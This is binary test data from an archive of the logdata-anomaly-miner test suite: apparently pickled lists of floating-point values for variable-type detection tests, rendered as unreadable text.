%j2G?L$G?̠TG?K\P]G?\.tG?>ߨOG?G?^>XG?CuG?QS{~G?1%OiG?5G?g9G?_zzG?P_G?ɚG?tG?ac@G?|ꞙG?8mG?pLG?jG?na{MG?a@1G?EG?cAG?8!G?(G?xG??G?9TpG?UmiG?pSG?/;G?TrG?+hG?9BёG?a4G?eG?k嘖G?sG? x$iG?vG?$P8,G? CG?mG3G?}[G?s~G?6G?uyG?שSG?I iSG?A>$G?rMo3G?.G?; =zG?{!G?i15G?XI%G?J<$G?X1tdG?뾡IG?ycUG?tNG?LUG?~7SLG?JyqG?G?SG?~|G?A2b1G?)\ G?R5QG?3-"G?;Yގ,G?%OvuG?}vŧG?"OuG?]߁G?ҪG?{G?P_G?4nKG?< G?NdVG?xhe"G?0cG?布ŠMG?zVRG?biHG? F9LG?˶RG?aYG? \G?kG?^+*G?주ZtG?}zG?ܱG?<爉G?&G?0QLՖG?ïyG?[dG?s ZEG?G: G?n,gG? wKjG?%"G?:G?n:cG?[ G?BG?*GcRG?a +EG?R/TQG?;WG?UvMO#G?!: G?#fG?oG?!*G?yjG?BӫG?4ZG?nWLG?lR}uG?TnG?eKG?m3G?麶G?Nl3G?b4G?正h1G?BvDFG?ܫ SHG?h1,G?[@G?13G?VxA/G? 8G?įy6G?"곑uUG?G?.G?=qG?8G?T:G?̎(FG?}HG?n|pG?;lRxRG?|%G?Α@G?zwvG?EaG? IG?;`iG? Cg%G?JPG?$0O/G?r3jG?cgG?U|?G?ʒG?ōeG?/ȉsۊG?8CG?o3OvG?ʍ@ǛG?"5G?RD%G?}G?ûJr7/G?R{覗G?ﻄݧG?uXG?sg(G?g[\G?6G?iDG?aGpG?y%hG?F]G?i*G?~ѼDG?璒cG?몌 G?>$k-G?yHFG?~uG? G?޻6G?QNG?Tc{G?91G?1|MG?-gG?f/G?p F%G?@uG?EOVG?*o1G?碍B G?CG?G?큣G?*onG?%G?ȻdxGG?Pv-G?=G?gؓ0cG?fvgG?φG?fAPJG? G? z G?(jG?ieXG?rv-G?QKG? G?? G?Ư|LG?﴿G?@d1G?=^4zG?$a G?n`G?2J٠rG?ۏG?ѼeG?uG?-G?G?/#G?(żZG?+68G?ӥG?͞*G?^G? mGPbG?N3'G?y(\0G?<>cG?À@G?qkG?h]G?夂#,G?\]=yG?t/2G?EzG?.0FG?ȴG?3}2)G?X7) G?S)G?G?osiG?^G?K-͓G?W"G?嶭Q&G?=ԋG?D?7:G?)ݗG?s)&G?jyG?6NG?-cG?!Sg]0G?MXG?ztG?Y)G?}G?؃ G?g1b=;G?sZaG?"RG?٣1G?G?U(G?, IG?p%oG?DhP1G?쾱G?O1P*G?Nr>@CG?L[;{G?LG? SG?UXCG?r3G?xAG?Y[HG?#G?-jDžG?eA!G?kaG?oG?G?#G*G?p-G?FG?ϛvDG?G?jc.G?/zG?G?gh[G?`>{G?`{JG? .e#G?XrG?7G?}=iG?XAjG?JG?YG7*:G?٣G?鵗 G?UrJG?흸G?RYDG?[5Ґ`0G?(G?U֛rG?V=KG?^„"G? xG?퇓`[G?ǟJG?/4pG?J| G? G?L-G?뾄.JG?~^G?ǖ>G?K,-]G?꤀ɛ2G?xY.G?ƩG?tzG?fG?ԨG?G?GO<G? f>qG?tmZ `G?YyFEG?5%G? ϼG?VZ'" G?ﴦbG?KSh|G?0I3ҫG?CG?>~m:G?u-G?yVl9G?6xG?kG?P g-G?*G?}oG?Ȱ^G?r]"4G?ȦYG?ʣ2aG?zHG?pqG?/}G?t1OG?T/`G?;ئG?ֽW'YG?gEG?]e@2G?d}QG?:XG?G6<G?zз6G?'OtG?陽);G?݄ՔG?Q G(>G?; G?yG?zRG? J^G?竓MAG?ĕ G?2G?hG?}ޕxG?A-}G?p+PUG?37kG?Sc?G?^x_[G?3FG?dmG?CRG?ieIG?]DG?N}G?aӗ`G?w-G?d]G?EdvG?qyGG?e*bG?ʝdG?FG?t)bG?0>cG?!G?HqG?&O+׀G? G? 
4G?4r>G?Tg]WG?怪AG?gmSG?ʲ:G?qľG?‰ G?do G?F~G?@iG?>95G?E- G?)"G?m*G?eŜG?$uvHG?/jG?p$G?T OwoG?UٍG?u:G?|yD G?!>L G?9Z,G?0o G?=3 HG?.KG?m"G?G?WG?G`SRG?ȫG?,$XJG?1ꤻG?G?-eG?]G?:ռG?纕$(HG?)r G?ꈭXڍG?[{NΩlG?G?PZG? oo#G?IG?ˠHsXG?!,G?k skG?#;RG?뱅)3G?篋3G?إx G?@*G? -&G?KzZAG?.7P@G?556G?&(G?ۜ:G?:K3G?8opkG?CG?-ҼG?|YG?UۧuG?ӬiG? ݁9G?[PCG?g0+G?8QG?唘> G?^ڋG?ᯙG?0GMG?[*lG?aG?cG??G?o`G?χG?5!RG?B40G?L8[ߚG?YmG?=mG?Gm4sG?ݮQUG?ZG?Tm[ŜG?7|G?cO8lG?ZAG?MG?FG?6G?l0G?Om|G?gNG?pP}G?\ U G?eIuNKG?% G?럌B5;G?}G?DNL4G?縫ޓG?eEAG?҈J:G?X=G?egvCG?%*1G?-"HqG?IT]JG?^;G?A)pG?yaG?51G??"=G?ɫG?栨_C~G?3 G?)bG? D-G?Ꙍ?=G? }.G?At G?iV2jG?K&'G?R*UG?hʒG?^T=VG?渠1=vG?UOJ6G? BG?N+5G?e:^G?yG?G?yG?/dG?7NG?՚^G?'G6G?;=Q:G?o٥G?莖;DG?"b1G?1[G? {>G?XRG? FQWAG?ĹoLG?닪 G?,>G? @G?uðG?IaG?9nG?zӿiG?N2ڔG? b\G?ܩ G?[ T-G?W&̝KG?" G?we-bG?LϲG?xlG?JYFG?&&\G?qi/G?݉9F1K~G?F3ZGG?0,{9[G? '^\G?N&5N~$G?C5G?F\G?IG?B[`~G?~@G?^I-G? G?6!q@G?.TG?U]G?zG?$G?σG?1hG??!G?~G~wG?2zQG?!EG?gNG?GuƟG?崩;G?8*6OG?U DG?L~%tG?GP]G?/(cG?p*8G?aǗØG?yK_G?56cUeG?LG?7@ZG?LA$G?, G?عKuLG?8LKG?(ärG?IG?G?һ5G?gG?2>BG?鶨LG?{:2G?NB4e](KKKKKKKKKKKKKKKKKKKKe](KKKKKKKKKKKKKKKKKKKKee.logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/vtd_data/beta5_data_test7000066400000000000000000000647021437606560100275360ustar00rootroot00000000000000i](](G?-_G?GMsBG?Z} G?R1G?NG?uGDG?GϚG?G?H9G?g^(5kG?V;LG?ݣ%G?~zdG?$^LG?(G?z&1ӂG?YGG?MG?Ǩz)G?'uG?PpG?A)lG?JMɩfqG?pCG?锢@;G?C\G?(WNgMG?^K<9G?=G?@ G?FG?{G?BsG?W֢G?ާj4n^G?H)G?Ye=G?Si G?ò8ZG?ɧG?7E6G?)}G?Sx( G?, JfG?hAG? .l>G?MvG?뤅KG?좡G?Z-kG?=5G?DzlG?t^G?QƻG?NE*G?0'# "G?T2G?gZG?R_BG?hG?诲e6 G? G?:ZGG?\%cG?zǓ_G?,i{G?4\ZG?E "SeG?MZTG?jCG?2AQHG?툎YG?&kV1?G?WG?e}G?E0vG?O@"G?7wRIճG?Ct"G?E %]CG?eYx7G? b_~G?7 TG?bvX.G? V8+G?A G?eSG?N,G?d9;G?(G?Z7G?츰NG?8 LVG?[1NG? TG?HQ&G?nG? :4G?_VG?뺈AG?aXG?RBnG?* }&G?f TG?G?WgG?zG?Wr՞G?!G?OԣG?;G?pG?xx)G?`?ve,wG?࣐e:'G?êHkG?1IG? BVG?{[@G?73 G?h|MXG?_ G?݂-G?{Q*G?cv7G?4]uG?^?xpG?f_G?qG?̶hG?ȉ5vpG?ZG?FуVG?՟G?9lsKG?s`"@zG?dЇrG?ޒJX%G?[(3G?)i G?k\G? 
cG?P{nIG?OSG?t}LG?=GG?Hzv_G??>G?({G?٢fG?06l G?8U-G?G?L%G?hl&G?bHG?4`6G?뒆."G?̶uU{G?W^G?yN~G?FcG?G G?na;GG?:dG?G?G?dLs>G?ՒG?2MݲG?YB G?#ҨG?ǸqG?@G?G?Rg|fG?GG?RegG?t%G?]tG?*tG?wKG?(;G?O!G?KgG?h&uG?tG?]/G?'!aG?Pm`G?EfتzG? G?њSG?0hNoG?. 6G?KG?N3YG?VOG?F+G??(ʹ{G?C2+YG?L G?Q>SG? lQGG?J^ -G? CG?G?ꬬFG? G?(_]<.G?3m@G?dAG?ĶO.G?[!G?V_XxG?9(9G?ȬwG?61BvG?upeG?/8G?,BnWG?qG?ЗG?s,AG?_nu* G?daG?w?G? G?08:}2G?oG?ᾼAG?4KL+G?eꢭG?ݓwtrG? @G?p<G? =9MG?ϏW(G?tHuG?禆ZmG?O/G?sG?۾jG?')G?够@?G?x@seG? ZG?G?G?G?? G?7PlG?\DG?HOrG?3q">G?-\G? * G?CG?8lG?c$JG?7;'G?) G?1TG?!ZLG?Cjw9G?5Jm`|G?E̕G?þpG?;rhG?"G?o_j5G?<3G?kdG?<VG?um4G?VG?=aG?QUzs]G?ZwXG?5+sLoG?5зG?тɏCG?3;'G?TEZ~.uG?%v!G?i\G?UG?uoG?oo4G?;CG?%eG?췦U9dG?ˀ'`G? loUG?;P"7G?z\G?B<G?x/ZG?i>G?Z*;G?9"G?60K%G?G?i$P8G?c:G? =LG?ȁG?]=hG?(i%G?aG?IR G?G?dq;G?) i~zG?0}G?^G?]Sb]G?Jc_G?DkqQG?uSdG?IG?C/G?6#77dG?WHi}G?h'G?U9G?ﻃXG?C_6G?X5G?FhQG?+nG? [[G?E. G?hl!)G?{5G?ݻG?G?9-G? dG?]O`G?CqG??PG?nG?P^G?4\G?ӷG?,~G?:IZG?NZG?TB6G?BΏiG?K7G?٣q1G?P馎)G?$tG?O91|G? :'G?[.G?y9LMkG?nAG?idG?yHd/G?LW-=G?4%SaG?G?OM2G?]G?1\G?%G?p=JG?' ge{G?摁G?-=G?OG?t.G?I;G?q-pG?৔9:G?椩vG?WG?G?_TG?xxG?G?t! G?lG?tMG?p?>vG?wG?F#bG?{(JG?JiG?H\urGG?9G?HGG?( G? }G?mxOnG?:ƻG?  6G?G@=f}G?J<7G?|y+G?CYG?y۷G?SPՒG?MqG? OG?z?ҔG?SfG?G?첦@G?i`+G?yjG? G?#r+G?4cG?enRG?0^i8G?pg>IQG?ttG?4sG?GG? iG?(FBiG?ݷEvG?cG?7 HG?rG?Q\{mG?<;ZG?;DAIG?ܴaG?$;'G?A`dLG?G?QG?%[&G?{bgG?n|ZG?I* G?Ԑ&?G?$ߕޑG?$R}5UG?}G?=hG?Yɤ]G?n:G?Y G? Vvzc}G?v(kg3G?'/OG?xG?喧AsG?x4G?beMF3G?h$G?QG?ze@G?@ɇ\=G?8BG?c^9G?bvG?YψG?qG?,@zG?flEcG?#)N0[G?CGNG?pzG?wgG?00~CG?pGVG?@>tG?> :jG?墁) NG?UG?'EG?2G?悔jG?G??$AG? IC G?m?G?FqG?ݟ*G?lqG?:RG?{YWG?I~G?o Uz G?CG?G?FJkG?VݪG?NG?I1eG?QuzG?`RG?EG?*G?UaG?JS|>G?Hz]6G? G?(G?oi`{G?GyG?iG?ϨUFG?!JI}lG?P~G?lS)pG?m G?'_cG?S3GHG?FA[G?X'G?vdG?G?cNG?Hw͊HG?"KW"G?dG?=mtlG?O\CqG?<~voG?*ۛG?!KG?6,G?OΔG?QG?zC*G?{(G?.k/G?A}G?AaG? x7WG?wG?g0nG?uCTG?_G?K43G?w~cG?؋NG? G?V'6G?x*yG?ꞏG? lG?6c*G?f˒G?'ƘG?g|G? G?禤mG?@rlG?дG?EG?)AG?7QTG?$vG?sG? #Ҽ[G?h)McG?줲B4G?\F^G?DG?4G?e1 -G?kUG?hG?5G?|,G?nɑ G?Ѹ{>G?aG?wlG?Ff1G?㚫rG?(G?V•q G?!A{L!G?G? 
5 G?ReG?BnG?hMG?ԥiC:G?ᄆ~YG?ʀG?텽6G?%gmG?`'G?IlfmG?Hi՗G? G?)G?P}:G?= lG? vEc'G?CIG? u|G?P m~wG?DžG?쓗UG?P:@G?>3zvG?։DG?_X G?TmpG?JI,G?JuG?drs/G?G?V]G?~BUiG?kw;G?hRR)G?sрG?VNG?켛CUGG?LxjG?זּu/G?絙d"/G?FlG?:.G? ZJdG?A:@G?KrG?ޏ;G?!ǷLG?+foG?tYcG?|Z.G?x%GG?U?=G?nQG?di G? G?cG?juG?1G?}G?CXG?裱G? nG?T/G?:æG?*e&G?LdG?惪k G?> |G?"nqG??2=G?` G?"G?xvG?K.G? G?z | G?G?TNG?,@MG?n>,G?BoG?_ځG? y[G?=zgJG?G?hyWG?,{h8G?]B"G? nG?=pG?!xW7G?fhG?sfeG?Jˋ~G?‚G?цG?6iG?vMG?ܬu-G?jUG?^03ƅG?kE]&G?HaG?fEoG? [`G?Fl1CG?Q3oZG?﫦BG?RqRKG?NjP>BoG?H.KG?.~oG?kR`G?Y̝G?JFHG?>=AG?}jG?;\AG?՟]G?/KH,G?YWG?EG8G?^VwG?G?*羽G?<tG?3>ohG?C1G? 9t6G?}0Y[G?]t/G?׺aG?iG?RncG?[uG?Z WG?-_$G?ʄG?oG?oU PG?IJG?PFXVG?SG?͔r)G?@G?~;G?%,4}G?;^OG?pG?'VG?N d?G?GW\C2G?\(G?5=.G?Ds=dG?G?ז:G?w{G?t}G?p xG?S rG?'h>EG?=G /G?E QUG?qBqG?Y MG?k@OG?pF"G?-*G?kBnuG?ㄐ@.G?dZPG?(^NG? M :G?] 8dG?Ǥ1d:G?;\vG?+G?DApG?+G?돦knG?]^|ȪG?~Y]G?U,GQG?.EG?\soG?G?B$zG?izG?CG?甎oFx0G? 2kG?Hx*بG?N}G?놁wG?gʆG?6p\JG?nG?aNxJG?B%[G?K5G?`_hG?2sG?j2G?Lc5G?&yG?񰰵TKG?*⯸G?-.;G?,ňG?mOYG?+UG?=,G?F{ZG?r$+G?l({G?V:G?D0}G?Pk\G?dmODG?)-<(G?xIGG?@h G?UQsG?Y|٪G?咤{[G?QG?Ռ dG?랱G?v>G?/M c3G?SG?rDu6G?[X~G?WDG?5d|gG?4$!G?6r7n+G? !G?ꙧTSG?9밃G?vv"VG?y E.G?G?sNFG?:GOG?ﶳ%vG?PǨĘG?=ZG?GFG?꧖BYG?Rm[G?}G?\cXsG?)S,+G?n\G?A G?-C`G?&]KHG?9 (G?KPzwG?;,fG?F-6G?s ,&yG?G9EG?O3 G?痗FG?^G?~FiG?>eG?v=?G? W.G?G?8 FpyG?a)czG?< cG?ϞHG?f G?#; ?G?2 kCG?ኹG?ǬG?蛱(G?MlG?GerG?Rr XnzG?,tgY5G?RʂS`G?kPG?sUTG?EHG?p.N0G?)gG?{cAG?F-҉!G?7$.[G?I5G?]VG?KnhG? KAG?a0VhG?;mG?약@6&G?0@G?M`VCG?8mG?,t6K/G?O@?RG?(׵G?YSI3wG? D_G?gJoSSG?$A'G?唓G?'G?رG?M[G?ퟦȎG?.4]G?bxtG?g? -G?^fG?G?CG?[푍G?n;G?n"G?#Hm~G?U]OG?0G?u7YG?6*_G?إfzG?x=G?Qo8)7G?Q\\gG?eG?{G?ޅOfG?y3VG?g9XSG?CG?l^\G?"aBlG?giaG?3wtXG?Hu+PG?B`G?|(G?)4k/G?WG?mlG?^G?8EG?䲧0 G? 6;PG?^d4G?R:G?,\G?idSG?9 (G?/ҰG?ڴ۳uG?͵bG?bG?{d""G?eX(G?UG?ο G?q1G?w]EG? IxG?D>S|G?귔+كG?srG?jG?ZG?\a)G?ꒆWG?hIG?1tG?U0G?MzT`.G?@+G?hG?Y?TG?CG?P`SG?X"ckG?n1[G?z~G?" G?An'G?SxG?qa ^G?L^}G?epG?8/RG?{Z]G?}.7zG?kꐔqG?엠pdaVG?v PG?YYG?QcqG?om?-G?ˎ60*G?}V%G?iC G?yàG?P=G?؊G? 
0UG?KIG?49 xG?Nl>G?qgG?!OG?t!TG?þG?gA,G?!G?@G?v|EG?b{]tG?:rIG?䌾dG?ۇ92G?HG?dSKG?Y'G?h6G?-f_G?ZG?wO>G?JlWSHG?4G?cO&WG?!xG?7uG?QqIG?雪|G?vSG?:rG?mbvHiEG?nUG?2G?gG?'+BG?mG?Au6G?鸽FG?qhG?ܙemPuG?BDG?v#d7G?G?us?G?/7ReG?︫0G?&$fG?2R{~G?oԹ)G?@dG?9jG?)xiG?2G?EG?G?:nG?/G?ՎkG? nFG?/AG?!NG?EӏG?a\8G?eHG?<9 FG?[#,G? BVG?cogG?7nXWG? G?ZwG?$:G?]5y G?:|ۗG?Ȫ*7jG?'G?HG?*ѡG? (mCG?ApG?7YG?qۻ{5G?m&G?^yG?噃G?G?kJG?;CVG?pD8mG?bƝ{G? FG?Fu)G?QG?ֆ,;G?O\pG?\heG?p6c8G?b$G?1-G?(&KG?dG?RG?+}G?Bά;G?XUG? TUG?M?l;G?\8(;G?5nG?V_G?GG?B}G?pLf~ԤG?i.#G?Kf(G?#'7}G?-$YG? A7G?d9p"G?!G?"G?-v@G?˂ G?G?GVzG?sG? 1 + G?b]G?"6נG?:DG?ڔ`oLG?>G?]%eASG?옭CnXG?4hCs&G?C:KVG?吮rG?AmoG?CC.qG?u>G?aUG?{eG? 7)-=mG?C/|G?mG?GVIG?[5G?XP G?ʠLG?1ޜxG?tKG?xG?4xG?a*[G?汬;FhG?TWyNG?ҞiG?b8G?\CwG?v(G?yG?V;HG?ӬCGG?PG?jgNjG?MyG?ho"#G?TbG? ;G?裉G?[-G?ja9G?Xy{CG?F~G?{- ۍG?:eG?aJgEG?\G?k[G?)(yG? XrG?OPG?lDDG?Hۦ:G?{u!G?rԶG?ckIG?ޢځoG?,Gvs9G?UG?~]}RG?[*4G?^EG?퀡"tG? ('G?E?G?24pG?U(3;! G?sxKAG? 6MPG?G?_J3G?VIG?ٟr&G?G?BG?`ΨG?DXP+G?NB_ZG?EIG?) G?gۉ>PG?$_gG?^ G?X0YG?.@+G?LgձG?G÷G?ttG?ߞlfƷG?ݔ" RG?%4G?2jG?j03QG?.t^.G?-ArG?`G?)DG?햘AG?-ѕ` G?퉂w8tG?d >WfG?2mxG? G?@ kG?]G?n[kG?gmhG?.yG?X$G?H~G?P=lG?ID!G?CsxG?Axq*G?{pG?KpG?,G?wHcG?LG?v`6G?jIyG?:G?|G?Hkw1G?bwG? )aG?篼W'ѳG?m^G?$IUIG?U|G?0~mG?o~ G?l-jGG?8K1WG? oG?=FG?8G?G?s1G?/(`]G?QKSG?_w+G?{VٓG?T6T?G?f$ʌG?pNfGG? YG?6L 1G? 1`G? Q)G?wDZ0G?襪G?DT@:G?⤉fG?Z&G?W/T4G?ሟXG?ν!G?캩oG?_߷G?+쌫G?QsSbG?O͏G??^G?s1G?G?ESG?0G?fٖǃG?? byG?@s&bG?&/3G?5G?`lbG?a@G?s>G?- ;G?G?J/eG?XLjpG?h% 4G? ͘=hG?}tG?:;GG?(LG?u wYG?[G?_RtG?dB G?rM7G?9#VG?&\G?l/G?F, G?荙)G?0]YG??7 G?c^E G?ipG?FG?uj=A/G?wBG?v>uG?QNG?~JG?{=RPG?볹PG? L@G?(atG?y/wG?֐$G?Ǣ5G?SfG?B{+G?nl(G?5tG?[6G?:RoG?G?RO'G?ݚ'!G?cWG?֒ G?WmyG?'-nG?=u۸G?yRGG?eeZG?`w9G?xG?@!G?CG?Z\lG?fayG?Y*!nG?襼VG?֊G? =:SG?謦PG?)XzG?qUG?buG?nBG?*ާG?Dnl1G?CLR0G?%n}*G?Y4KG?JZ=G?sKG?z?G?b?G?8G?jY/G?sGG?1G?@hG?A&G?'EΘG?6{G?$rjsG?+G?%8G?2bOG?wUG?C}7G?䭤#G?aQEyG?#(owG?'}G?8?G?3YG?GG?-G?Z4G`vG?w\!G?SG?r^xG?|UG?ԛAG?rIG?ˣaG?oӗG?3 G?Yq+vIG?X/ jG?5YPG?^彝QG?XzzG?/ ƲG?.|U-G?݈kG?:G?$[ĩG? 
a/G?LJBG?~¦!G?^sMSG?F,EG?ԵN:G?ʕT#G?q^ԚG?PG?pU?G??TnCZG?0G?G?P YG?hG?jfuG?(G?.ⷹG?zD6G?[?نG?z}G?ہG?[ZG?h(G?G\G?wgG?2G?p ̧%G?puD(G? [ G?-QG?u5G?7(\8G?# \dyHG?`yAG?K+#;G?抠|'G?CIMPG?늊쎿G?;3{G?IIG?彙OH G?*_AsG?C-7D=G?H&G?"W:G?<2yG? 0ցG?Gh[ G?šG?ЀG?[xG?* VwlG?l/PG?.[G?eYG?휃xG?ʳL.G?JS `G?_aG?p?G?m0FG?knM G?ȻmdG?릇,G?+G?`G?{#vG?sqUdqG?4[EG?ݛZEzG?ri]G?쓫NVQG?LQ2G?ڌ G?<*G?UUG?'/G?K<(G?+яG? e](G?T7G?dW _YG?!X/G?.G?dݷG?3I#G?kZ"O 'G?ᆬWG?^gG?(1G?O+G?橷yG?qh(G?-W3>EG?7< nG?}]G?91'G?;j'G?u0ZG?IʄK$G?)dG?ediG?ItnG?ߔlZG?0](xG? pG?, A1,G?zFG?h'? G?ARsG?_G?ІB G?|G? -JG?쾧:G?"52G?VAG?ydG?ٜa.aG?قX}G?.G?P#G?{JH^G?AG? G?ZTG?얿=G?LpG?aLG?&_$tG?O0?:G?F[G?&cG?UG?t1HG?YG?G?pr\G?hr]oG?Sv;G?߫r#G?\lG?F}G?K2\G? G?J5G?,E7G? :sG?0,<#G?S-yG?3;G?X!? DG?G?K$R|G?_G??⛿'G?EG?쾖g6G?'@G?IC G?âG?9]G?tc0LG?OM& G?@ ݶG?G?WyƛG?^G?3BG?ж+9EG?XfG? uG?Zu7G?"#G?RAG?nyG?m3G?;hV2CG?d} G?qG?A4Q"G?셐IG?H~]G?c[qEG?:IfG?{]G?o]G?smG?eHJCQG?r\G?t>]G?:]:G? ?)G?OP G?C G? G?;">G?gG?,w3BG?_3G?:i6G?U!ϕG?v8JG?߮dG?"Z*G?yv3G?.F=EG?]LG?oG?'CڀG?bQG?xdG?)YG?g;.G?6O G?At@G?YWG?ڻ!G?s1G{G?ghG?K\G?1 $7G?*]lG?Q;G?Þ^G?ɟG?lG?fZa?CG?ǵG?2@G?0_j,G?6efG?ZDaG?.dG?c>,G?=G? ]VHG?N 'ORG?,G?8GG?CRG?kɄcG?A~wG?˱;G?/1G?UyG?%G?BLTG?Aa[G?oM'G?}tG?ړ3G?ﻒ?Q#G?c$G?Hܶ栄G?M!G?IhG?$v(G?j0G?YjG?}h(G?{->"G?qN{0G?;|v>G?'G?pj`#G?9! G?+#G?Ζ[G?!G?_ewG?Ө.G?`G?|sG?4>fG?0؎OG?;GwnG?"bYuG?d\G?:"sHeG?줸:{rG?, G?:#G?G?HG?`.G?G?8 G?6FpG?#G?*t!gG?<}UG? i`G?刢G?;g%G?&WG?u#fG? G?c2G?[)G?rcG?첃\yG?yG?,"G?! G?΂G?@AG?TRG?:EG?ã;%Z`G?|{^G?zAȽG?guG? l1G?rtn&G?]JG?7}G?YG?esS,G?cmG?tLG?W*G?JL[G?n!tG??8G?/G?gN!?G?bvIG?89ճG?ؽG?_pH!G?k G?Me'&G?G?ѽG?O}0G?Prbk[G?,'G?2ӔG?ܘN !G?0G?QVG?[ƪ G?qb1G?aG?te~G?<F%(G?+VG?BatG?%ZհG?GSAG?UVb:yG?ȓG?KD~G?1G?"*m dG?8 G?]SG?x97z=G?*]G?9:G?홨¥G? i#bOG?g%rG?2dG?WmI gG?훗6kG?(ťG?)n-jLG?XiڵG?4dG?vEG? Hj;"G?X͍H!G?欲hG?+DHG?_=]G?)/>!G?S&G?+ G?4/G?+o#G?ڲG? *>XJG?<G?*&oG?BcG?YG?֍%RG?H@)̚YG?x G?yb8RG?T/IG?bVG?$%OG?/TG? 'G?iG?B HfG?~G?((FSG?^+G?B8G? 
}G?Jj-G?:^^G?ݾ+G?=wcG?7 ~$):G?XZ)G?Ҁo0ʴG?ͬ$|G?聯G?﬎(eG?JC|G?n1?G?lG?L;aG?gKG?酸8G?=yG?i|&G?QuG?qdtG?Y,sG?轲GM'G?q4\G?߄G?{boG?l߳G?쪲.tG?]@G?/J՞G?ꡪ4G?ߵ613G?QG?TIŨG?_cNG?~G?LtHG?,F!%>G?ήTRRG?'۠G?̿G_ G?e艩G?JcXG? ]klG?[ͧtG?$ǜG?)ٜv-G?땔G?'[G?5 zwG?/M5PKG?(?vG?ǩaG?#r3G?ٳ"G?@_a G?s2MG?ܵe`/G?E%OǻG?拕5cG?أ G?QJiG?%~[G?h뒩G?釄G?B\f'G?k iHRG?xtsG?,|G?cG?}eG?{G?^BG?TG?}ROgG?80aG?[uMG?W/G?~'G?1c#4EG?)G?G?韘G?MRBG?ϣG?!bpG?َ.8G?kx~G?|=G?鼺qUG?gu9 _G?Do}G?-ȱG?G?2n'G?PސoDG?tCG?ĪKG?'RG?j={G?Vzn+G?xHG?A֌G?.S0G?1DG?#gG?J,G?{4qG?II>wG?KpyKG?m {@G?NfRG?vG?fSG?MMsNdG?ҮgZG?ێ8G?{LA}G?ernG?fycG?mX !G?xAG?'G?ZםxG?d1G?bWJG?$G?܊SπG?$UYG?馪KG?{SbhG? gpG?֯TG?:"G?jrXG?aeG?@G?"s`G?_ 'G?Ε 1G?ud$bG?찷 ,{G?鲩,G?|YG?%G?WLG?7S\G?HxG?6SdXG?AfAG?8]] G?E1QG?O{mG?G?DG?3G?Oq BG?/uG?ILG?x$=G?+-2G?ǫ`G?F1G?$ym- G?wG? toG?NG?o|pmG?FP+iG?WCG?ԅ[G?fG? 'G?DG?͖vNCG?UG?ظ[(qG?$4TG?2'SG?G?hȦG?jk'G?5nmG?xO%G?`izG?n` G?DG?dfG?,+GG?g["G?8xpG?G?悱9TG?ir DG?`GMG?rmG?/aG?KbG?)*jf G?`/1kG?7qG?G?ﴮv|&G?EG?l)G?bG?kOG?j0~G?xG?%cHWG?G? aG?sw0y|G?Nr}kG?zz"㧧G?f3G?\HsG?IG?ZG?UG?@:/kG?VϠIG?銦:xG?YS-G? G?NL컴G?ިG?I6j([G?HQG?D(G?/2G?Ԑ:}G?pG?HKG?[G? G?<_iG? h8:G?-G?tL 1G?vG?Ms%G?6G?* G?O3JG?}G?,;G?ڛ G?F4G?ƁLG?O"!^2G?u9zG?B/G?7G?:zGG?8|G??WwG?kҿLG?`f#G?,@!4G?J G?H G?A$G?m G?i&=G?zG?LQpG?XਜG?c7G?V9 G?3`G?*(ѮG?a:G?n f >G??G?5fSG?cfzG?>pG?^@G?%G?2G? fG?]kG?0{tG?@VG?&qG?&'hG?\ 'G?i=G?8DG?|1{G?P\jG? :#1G?|6φG?yc6eG? ))9e](e](ee.logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/vtd_data/nor_data_test3000066400000000000000000000432761437606560100273330ustar00rootroot00000000000000F](](G?©bXG? $GG hOsGGwm0G ;GE%8G(AGp}G@5cG?)Gι$G?2O\zG?75Q6GQy r9NG&l&G?MIGmG G? YG?="G?MSOMG?_"/G?4fpG?ζbGעfǻG@g"6G?tN|LG G΄eG?U¤G@~'G?cz`CqG헎yG_~rG?n4yG?lyXG?/ IG?1jG?K^ G? @[M?G&GD"^G?4 iG?AUSGii+G?IG?34G?.daG?)@G?͝?G?ܫWe6G4*OGqG{AlG?>39bDhG~tK(G? "G?jM)G? 
G +!pG?VZGd[OGGf^VGWkAGѵglv8G?>_yG?=߲G?~GpwkeG?aGp6,G*/G?S[ٚG7۵G?p/ G?륔I ]G?w$HG?ZrAG?q˥sRG" ]GG?]GRPGs>GLGśGPG`PҾGV`G?J\8G?Ay`ފG?{rfeG?<>}G?ȫ5G$FG?HÇi(Gh*PG۔oGSIZG?qwGk (pGW G?|,XYGxGC1G?(BeG%Nt*G?9 5AGvVZ5G=G?6s^bGx5G?0"ghG=C9G?%bG)pEG5EG[tyG?SfrGd%oGPوGƃނG?ZG?ca8uG4Q[G@,G䯟\GGG?->Gk GrΥGFG?$9>G\:3j#G2(CRG7+FhG?JWgG?FGwGm`GYlwG?{UG?+G?ڔG'G?Ge:dG?GKG?vvmGrG?, G22G2SG*~~G?=Ӌ G?[ 9AG?G?iXG| %GkW*;GM g7G?3J2G?Tj@G?C?BG?\I+Gw1ҙG{)}TG0<Gә.;MGjGJG=lG  G?ΉVwx[GzG) G?ʇPV\G?BG#}$o&G?[Gd!EGjFeG?@/G*ԁG݃h&GծG?1s G? dWG^>@fG97yG?˦+'GwG? CHՄG߇*G?,B}G?S G=fG͉Gxj*)GkG?(KmnG?չY`AGX}G3/Glp>(pG?!MnUG?r_GriGt.3GPWT4G\MMjIG@rsG?}GP'G~G?*pG s]G?a?G?u`Gf1CG?ݓ+tjKG[k0G䨂iG[nujG?]ɊG`!fG?:"G?۞G?XG?xnGZ:G?[_vGG?Քit%GӾYGኛTG;Gܿ~0G?t.G?b(G?G?j .QG禗ֲcbG?A.0yG㪂G1 p0AG?b|ljF G?x;G@Sت)YG?zGnD Gn; "G?&rWGܕAG?;yސGL'ljG?:;G?dM@G jmTBSG[9v.G?#ReMG?_|FaG$%?R@G?ňf Gꤌ6 UG?<+G?Keۛ3GzG9IG=G?|p G?HMy;GNyG?1˶G?繈GMG"QA|-GnzG&mG?h6mGr;~LG?2C\QW2G?0 (GG?! G?抎"*G?abWG?ٌGG\>vG?h?pG?`G?ޣtG?N<G? e G G?reN4G֜*mJ-G;Go=G?@jG?hhOG?iPiG?CTG<'G CNG4G)3Hm3G?`GCG@ ~G?[ŇG?G2W*,G?)G?&3G?g,cG+`G%s'G?EXG7 0Gā˅G??fNG?weGbX^ $G?;+`G?BEG?M7GڳG?<+G͢65hG?B6Gۗ"(aG?5~G?yOGP؎ GfCGPȂGR/p G?#G?[+.fG{jlG?rXG?~;h".G?)B Gҗ GHHNG?PyG?.3G?frG?݊ gG?nlinG?ibG?Ջ0|AlGG)bG?yC 